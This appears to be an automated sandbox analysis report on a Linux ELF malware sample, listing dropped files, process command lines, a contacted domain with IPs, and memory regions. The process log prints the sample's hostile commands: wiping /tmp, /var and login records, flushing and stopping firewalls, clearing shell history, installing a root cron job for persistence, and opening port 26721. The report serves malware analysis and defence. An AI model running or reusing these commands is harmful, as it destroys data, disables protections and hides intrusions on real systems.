Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86.elf
|
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/dev/ocmount
|
Bourne-Again shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/cron.d/mount.sh
|
ASCII text
|
dropped
|
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86.elf
|
/tmp/x86.elf
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/rm
|
rm -rf /tmp/config-err-jFiNWb /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-qf3lAyPpWVCU
/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-OhEyzg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-8ySu1e
/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-iKxwVi /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-ol8bni
/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-LPFY4g /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-O3uVvg
/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-r702ki /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-CBTCVe
/tmp/vmware-root_726-2957583432 /tmp/x86.elf /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail
/var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket
/var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot
/var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid
/var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid
/var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d
/var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd
/var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user
/var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-K5j1Of
/var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-sPszWi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-kdgXJf
/var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-EvKsMg /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-0DTUmj
/var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-fe4hsi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-K1ZmQh
/var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-Lb1VUf /var/log/wtmp
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "rm -rf /tmp/*"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/rm
|
rm -rf /tmp/*
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "iptables -F"
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/iptables
|
iptables -F
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "pkill -9 busybox"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/pkill
|
pkill -9 busybox
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "pkill -9 perl"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/pkill
|
pkill -9 perl
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "pkill -9 python"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/pkill
|
pkill -9 python
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "service iptables stop"
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/service
|
service iptables stop
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/basename
|
basename /usr/sbin/service
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/basename
|
basename /usr/sbin/service
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
|
/usr/bin/systemctl
|
systemctl stop iptables.service
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/sbin/iptables -F; /sbin/iptables -X"
|
||
|
/bin/sh
|
-
|
||
|
/sbin/iptables
|
/sbin/iptables -F
|
||
|
/bin/sh
|
-
|
||
|
/sbin/iptables
|
/sbin/iptables -X
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "service firewall stop"
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/service
|
service firewall stop
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/basename
|
basename /usr/sbin/service
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/basename
|
basename /usr/sbin/service
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
|
/usr/sbin/service
|
-
|
||
|
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
|
/usr/bin/systemctl
|
systemctl stop firewall.service
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "history -c"
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "rm -rf ~/.bash_history"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/rm
|
rm -rf /root/.bash_history
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "history -w"
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /dev/ocmount"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /dev/ocmount
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c /dev/ocmount
|
||
|
/bin/sh
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/tmp/x86.elf
|
-
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
|
||
|
/usr/libexec/gsd-sharing
|
/usr/libexec/gsd-sharing
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
|
||
|
/usr/libexec/gsd-wacom
|
/usr/libexec/gsd-wacom
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
|
||
|
/usr/libexec/gsd-keyboard
|
/usr/libexec/gsd-keyboard
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
|
||
|
/usr/libexec/gsd-print-notifications
|
/usr/libexec/gsd-print-notifications
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
|
||
|
/usr/libexec/gsd-smartcard
|
/usr/libexec/gsd-smartcard
|
||
|
/usr/libexec/gvfsd-fuse
|
-
|
||
|
/bin/fusermount
|
fusermount -u -q -z -- /run/user/1000/gvfs
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
|
||
|
/usr/libexec/gsd-media-keys
|
/usr/libexec/gsd-media-keys
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
|
||
|
/usr/libexec/gsd-screensaver-proxy
|
/usr/libexec/gsd-screensaver-proxy
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
|
||
|
/usr/libexec/gsd-sound
|
/usr/libexec/gsd-sound
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925
actions "Action Buttons" "Log out, lock or other system actions"
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
|
||
|
/usr/libexec/gsd-power
|
/usr/libexec/gsd-power
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/sda2
|
There are 174 hidden processes, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
octopus1337.geek
|
156.238.224.214
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
156.238.224.214
|
octopus1337.geek
|
Seychelles
|
||
|
212.118.43.167
|
unknown
|
Russian Federation
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8064000
|
page execute read
|
|
||
|
8064000
|
page execute read
|
|
||
|
806e000
|
page read and write
|
|||
|
ffe49000
|
page read and write
|
|||
|
8936000
|
page read and write
|
|||
|
806a000
|
page read and write
|
|||
|
ffe49000
|
page read and write
|
|||
|
f7f27000
|
page execute read
|
|||
|
8936000
|
page read and write
|
|||
|
806a000
|
page read and write
|
|||
|
8938000
|
page read and write
|
|||
|
806e000
|
page read and write
|
|||
|
f7f27000
|
page execute read
|
There are 3 hidden memdumps, click here to show them.